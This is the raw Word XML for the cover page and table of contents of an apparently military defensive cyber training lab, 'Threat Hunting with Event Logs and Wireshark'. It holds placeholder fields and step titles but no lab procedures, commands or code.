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7087595"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:caps/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="7B2166AD" w14:textId="12346676" w:rsidR="00ED051E" w:rsidRDefault="00101A36">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wpg">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CED7123" wp14:editId="5AABF720">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:align>center</wp:align>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:align>center</wp:align>
                    </wp:positionV>
                    <wp:extent cx="6852920" cy="91414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1460"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="6858000" cy="9271750"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvPr id="120" name="Rectangle 120"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="7315200"/>
                                <a:ext cx="6858000" cy="143182"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:srgbClr val="5F80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5F80A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9523A" w14:textId="6A25E71F" w:rsidR="003B12C7" w:rsidRDefault="00FB4A76">
                                  <w:pPr>
                                    <w:pStyle w:val="NoSpacing"/>
                                    <w:rPr>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="32"/>
                                      <w:szCs w:val="32"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="32"/>
                                      <w:szCs w:val="32"/>
                                    </w:rPr>
                                    <w:t>&lt;Instructor&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="3B746492" w14:textId="46B84A6A" w:rsidR="003B12C7" w:rsidRDefault="003B12C7">
                                  <w:pPr>
                                    <w:pStyle w:val="NoSpacing"/>
                                    <w:rPr>
                                      <w:caps/>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:caps/>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                    </w:rPr>
                                    <w:t>32 WPS/DOA | Nellis AFB, Nevada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solidFill>
                                <a:srgbClr val="00206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30549" w14:textId="7CD73E6C" w:rsidR="003B12C7" w:rsidRPr="00C71519" w:rsidRDefault="00FB4A76">
                                  <w:pPr>
                                    <w:pStyle w:val="NoSpacing"/>
                                    <w:pBdr>
                                      <w:bottom w:val="single" w:sz="6" w:space="4" w:color="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
                                    </w:pBd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&lt;Weapon/Defensive&gt;</w:t>
                                  </w:r>
                                  <w:r w:rsidR="003B12C7">
                                    <w:rPr>
                                      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                                      <w:b/>
                                      <w:bCs/>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="72"/>
                                      <w:szCs w:val="72"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve"> System Training - </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                                      <w:b/>
                                      <w:bCs/>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="72"/>
                                      <w:szCs w:val="72"/>
                                    </w:rPr>
                                    <w:t>&lt;#&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="552EAFF6" w14:textId="206D4936" w:rsidR="003B12C7" w:rsidRPr="00C71519" w:rsidRDefault="003B12C7">
                                  <w:pPr>
                                    <w:pStyle w:val="NoSpacing"/>
                                    <w:spacing w:before="240"/>
                                    <w:rPr>
                                      <w:caps/>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="36"/>
                                      <w:szCs w:val="36"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:caps/>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="36"/>
                                      <w:szCs w:val="36"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve">Lab: </w:t>
                                  </w:r>
                                  <w:r w:rsidR="00FB4A76">
                                    <w:rPr>
                                      <w:caps/>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="36"/>
                                      <w:szCs w:val="36"/>
                                    </w:rPr>
                                    <w:t>&lt;Content</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00A5701B">
                                    <w:rPr>
                                      <w:caps/>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="36"/>
                                      <w:szCs w:val="36"/>
                                    </w:rPr>
                                    <w:t>&gt;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ED7123" id="Group 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:539.6pt;height:719.8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" fillcolor="#5f80a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" fillcolor="#5f80a5" stroked="f" strokeweight="1pt">
                      <v:textbox inset="36pt,14.4pt,36pt,36pt">
                        <w:txbxContent>
                          <w:p w14:paraId="5919523A" w14:textId="6A25E71F" w:rsidR="003B12C7" w:rsidRDefault="00FB4A76">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing"/>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t>&lt;Instructor&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3B746492" w14:textId="46B84A6A" w:rsidR="003B12C7" w:rsidRDefault="003B12C7">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing"/>
                              <w:rPr>
                                <w:caps/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:caps/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>32 WPS/DOA | Nellis AFB, Nevada</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" fillcolor="#002060" stroked="f" strokeweight=".5pt">
                      <v:textbox inset="36pt,36pt,36pt,36pt">
                        <w:txbxContent>
                          <w:p w14:paraId="7B430549" w14:textId="7CD73E6C" w:rsidR="003B12C7" w:rsidRPr="00C71519" w:rsidRDefault="00FB4A76">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing"/>
                              <w:pBdr>
                                <w:bottom w:val="single" w:sz="6" w:space="4" w:color="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
                              </w:pBd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&lt;Weapon/Defensive&gt;</w:t>
                            </w:r>
                            <w:r w:rsidR="003B12C7">
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="72"/>
                                <w:szCs w:val="72"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> System Training - </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="72"/>
                                <w:szCs w:val="72"/>
                              </w:rPr>
                              <w:t>&lt;#&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="552EAFF6" w14:textId="206D4936" w:rsidR="003B12C7" w:rsidRPr="00C71519" w:rsidRDefault="003B12C7">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing"/>
                              <w:spacing w:before="240"/>
                              <w:rPr>
                                <w:caps/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:caps/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Lab: </w:t>
                            </w:r>
                            <w:r w:rsidR="00FB4A76">
                              <w:rPr>
                                <w:caps/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                              <w:t>&lt;Content</w:t>
                            </w:r>
                            <w:r w:rsidR="00A5701B">
                              <w:rPr>
                                <w:caps/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                              <w:t>&gt;</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:shape>
                    <w10:wrap anchorx="page" anchory="page"/>
                  </v:group>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
        <w:p w14:paraId="3BF8F69A" w14:textId="4AC8E36D" w:rsidR="00ED051E" w:rsidRDefault="00ED051E">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:caps/>
              <w:noProof/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:id w:val="-1277322189"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="4810A911" w14:textId="7CF772B8" w:rsidR="00991A38" w:rsidRDefault="00991A38">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="31794BCB" w14:textId="7E13FB0D" w:rsidR="00FB4A76" w:rsidRDefault="00991A38">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc145852561" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lab: Threat Hunting with Event Logs and Wireshark</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852561 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="155D75C1" w14:textId="7D600FD9" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852562" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852562 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D7B19C5" w14:textId="72B4A6EE" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852563" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Procedures</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852563 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36987E4C" w14:textId="6F2745D0" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852564" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 1.</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Configure Custom Index Patterns</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852564 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1331FA63" w14:textId="683C7991" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852565" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 2.</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Explore Event 4688 Fields</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852565 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F5F5418" w14:textId="5330DB2F" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852566" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 3.</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Review the Index Mapping</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852566 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="072A1C66" w14:textId="51CE44D4" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852567" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 4.</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create a Threat Hunting Dashboard</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852567 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75903C4F" w14:textId="6C4E7D1B" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852568" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 5.</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create Visualization of Child Processes</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852568 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
